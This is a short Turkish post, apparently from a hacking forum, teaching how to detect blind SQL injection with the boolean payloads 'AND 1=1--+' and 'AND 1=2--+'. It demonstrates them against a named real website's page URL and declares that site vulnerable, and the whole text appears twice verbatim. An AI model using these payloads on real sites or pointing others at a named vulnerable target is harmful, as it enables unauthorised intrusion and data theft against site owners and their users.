selam beyler
blind sql injection bulmayı göstereceğim.
payload: AND 1=1--+
eğer bu zararlı kod parçacığını web servisinde veri akışı olan bir yere koyduğumuzda hata vermiyor
ama AND 1=2 yaptığımızda sitede AND 1=1 de olan bilgiyi vermiyorsa blind sql injection mevcuttur diyebiliriz.
ÖRNEK:
site: http://www.sennis.gr/page.php?pid=12
payload: AND 1=1--+
siteye girdik normal bir sayfa karşımıza çıktı.
payload'u ekledik. sayfa değişmedi
site: http://www.sennis.gr/page.php?pid=12 AND 1=1--+
payload 2: AND 1=2--+
siteye yeni payload ile girdik. ve eksik bilgi geldi. yani blind sqli mevcuttur diyebiliriz.
site: http://www.sennis.gr/page.php?pid=12 AND 1=2--+
kaynak: https://www.exploit-db.com/docs/42209
blind sql injection bulmayı göstereceğim.
payload: AND 1=1--+
eğer bu zararlı kod parçacığını web servisinde veri akışı olan bir yere koyduğumuzda hata vermiyor
ama AND 1=2 yaptığımızda sitede AND 1=1 de olan bilgiyi vermiyorsa blind sql injection mevcuttur diyebiliriz.
ÖRNEK:
site: http://www.sennis.gr/page.php?pid=12
payload: AND 1=1--+
siteye girdik normal bir sayfa karşımıza çıktı.
payload'u ekledik. sayfa değişmedi
site: http://www.sennis.gr/page.php?pid=12 AND 1=1--+
payload 2: AND 1=2--+
siteye yeni payload ile girdik. ve eksik bilgi geldi. yani blind sqli mevcuttur diyebiliriz.
site: http://www.sennis.gr/page.php?pid=12 AND 1=2--+
kaynak: https://www.exploit-db.com/docs/42209